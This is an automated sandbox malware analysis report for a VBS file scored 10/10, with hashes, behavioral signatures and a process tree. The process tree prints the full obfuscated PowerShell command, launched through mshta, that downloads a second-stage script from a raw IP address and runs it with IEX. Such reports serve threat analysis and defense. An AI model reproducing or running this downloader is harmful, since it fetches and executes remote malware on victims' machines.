Overview

overview

10

Static

static

STJQYIULUD...GX.vbs

windows7_x64

10

STJQYIULUD...GX.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    15-02-2022 02:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    STJQYIULUDCELUOGYJKBGX.vbs

  • Size

    6KB

  • MD5

    74f58ac31a1f70bb4c704f31074882c0

  • SHA1

    247ab701feff34cef747bf8e388b3639b8af9084

  • SHA256

    7c1862829839b836c1c21bb92e65316c1148efefab2028eccf91231bc50fe2c2

  • SHA512

    14e0e9a5f63e6b3807378a297146ba08ebdfbc73ff3ed27741761b22d53d3be59bcaa5ff2e06caa6d8d6f2e9d0f6fef9c530260d80fb61d50ea8ad904d990169

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STJQYIULUDCELUOGYJKBGX.vbs"
    1⤵
      PID:1672
    • C:\Windows\system32\msHta.exe
      msHta.exe HttP://3.22.248.2/qw/EncGQE.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HQPIRTNLNVVNENVTOSFOQPX = '[\6$@5=3#6_&86}<!6#+@86y\6$@5=3#6_&86}<!6#+@86t^($+0)+*\]^26/7=-57)$8[#9@-!=-\{&9]2/5!995](.IO.\6$@5=3#6_&86}<!6#+@86t\)6)6%-\+27-+}/$$$+)=)^($+0)+*\]^26/7=-57)$8=4_14%)*6(=8+{&_%7{17$[#9@-!=-\{&9]2/5!995](\)6)6%-\+27-+}/$$$+)=)^($+0)+*\]^26/7=-57)$8=4_14%)*6(=8+{&_%7{17$d^($+0)+*\]^26/7=-57)$8\)6)6%-\+27-+}/$$$+)=)]'.Replace('\6$@5=3#6_&86}<!6#+@86','S').Replace('^($+0)+*\]^26/7=-57)$8','E').Replace('\)6)6%-\+27-+}/$$$+)=)','R').Replace('=4_14%)*6(=8+{&_%7{17$','A').Replace('[#9@-!=-\{&9]2/5!995](','M');$HRTEUQOOTFTZLQAZFWAURIJ = ($HQPIRTNLNVVNENVTOSFOQPX -Join '')|&('I'+'EX');$HZSOPPIHHQLRYYEQVBEDSUX = '[1$56\-<^}+$099--+0}#_/y1$56\-<^}+$099--+0}#_/}({+@((<0%\3==8$3+)0<#=#\%+0[^=2*8#}8($/-$/}m.N=#\%+0[^=2*8#}8($/-$/}}({+@((<0%\3==8$3+)0<#.W=#\%+0[^=2*8#}8($/-$/}bR=#\%+0[^=2*8#}8($/-$/}qu=#\%+0[^=2*8#}8($/-$/}1$56\-<^}+$099--+0}#_/}({+@((<0%\3==8$3+)0<#]'.Replace('1$56\-<^}+$099--+0}#_/','S').Replace('=#\%+0[^=2*8#}8($/-$/}','E').Replace('}({+@((<0%\3==8$3+)0<#','T');$HOHVKHWHGAYHFLLBDNQFERO = ($HZSOPPIHHQLRYYEQVBEDSUX -Join '')|&('I'+'EX');$HUXHSFRXTJGUNPZKBAKQKDB = '7-0=!*[88^$]!&^-<0=!40r+6^1809#8_[3#9!*7&%/(}a8&_{*!#&(*%\348!!*/}8{+6^1809#8_[3#9!*7&%/(}'.Replace('7-0=!*[88^$]!&^-<0=!40','C').Replace('+6^1809#8_[3#9!*7&%/(}','E').Replace('8&_{*!#&(*%\348!!*/}8{','T');$HDGSFNUEFWTDNIWVCKPZGAN = '1847$$37[6=[//!%=/1+29)^67!]6\<-*%^$_!]<%#=9tR)^67!]6\<-*%^$_!]<%#=97759<]}1}&=-))27371/7/pon7759<]}1}&=-))27371/7/)^67!]6\<-*%^$_!]<%#=9'.Replace('1847$$37[6=[//!%=/1+29','G').Replace(')^67!]6\<-*%^$_!]<%#=9','E').Replace('7759<]}1}&=-))27371/7/','S');$HPLQTYQUTWSSOTBNQTGWCJW = 'G=-{19_]8@-38\_}33$<}92t60!3610=]928-+4{4@5<9{=-{19_]8@-38\_}33$<}920^%\{#218_*!9/22]03/\2pon0^%\{#218_*!9/22]03/\2=-{19_]8@-38\_}33$<}920^%\{#218_*!9/22]03/\2t60!3610=]928-+4{4@5<9{=-{19_]8@-38\_}33$<}92am'.Replace('0^%\{#218_*!9/22]03/\2','S').Replace('=-{19_]8@-38\_}33$<}92','E').Replace('60!3610=]928-+4{4@5<9{','R');$HIPJLQVQFSETDTUGXWWOVEN = '821#8{8)<4-+*%_7^[/_]}6_\4<00(_0{#202{{&^89/a^34)4\]92(]$[!%5}\0#$%To6_\4<00(_0{#202{{&^89/n^34)4\]92(]$[!%5}\0#$%'.Replace('821#8{8)<4-+*%_7^[/_]}','R').Replace('6_\4<00(_0{#202{{&^89/','E').Replace('^34)4\]92(]$[!%5}\0#$%','D');&('I'+'EX')($HRTEUQOOTFTZLQAZFWAURIJ::new($HOHVKHWHGAYHFLLBDNQFERO::$HUXHSFRXTJGUNPZKBAKQKDB('HttP://3.22.248.2/qw/Ps1HJ.txt').$HDGSFNUEFWTDNIWVCKPZGAN().$HPLQTYQUTWSSOTBNQTGWCJW()).$HIPJLQVQFSETDTUGXWWOVEN())
        2⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1836

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/764-54-0x000007FEFBAD1000-0x000007FEFBAD3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1836-56-0x000007FEEEEC0000-0x000007FEEFA1D000-memory.dmp

      Filesize

      11.4MB

      Download

    • memory/1836-60-0x0000000002534000-0x0000000002537000-memory.dmp

      Filesize

      12KB

      Download

    • memory/1836-59-0x0000000002532000-0x0000000002534000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1836-61-0x000000000253B000-0x000000000255A000-memory.dmp

      Filesize

      124KB

      Download

    • memory/1836-58-0x0000000002530000-0x0000000002532000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1836-57-0x000007FEF3D2E000-0x000007FEF3D2F000-memory.dmp

      Filesize

      4KB

      Download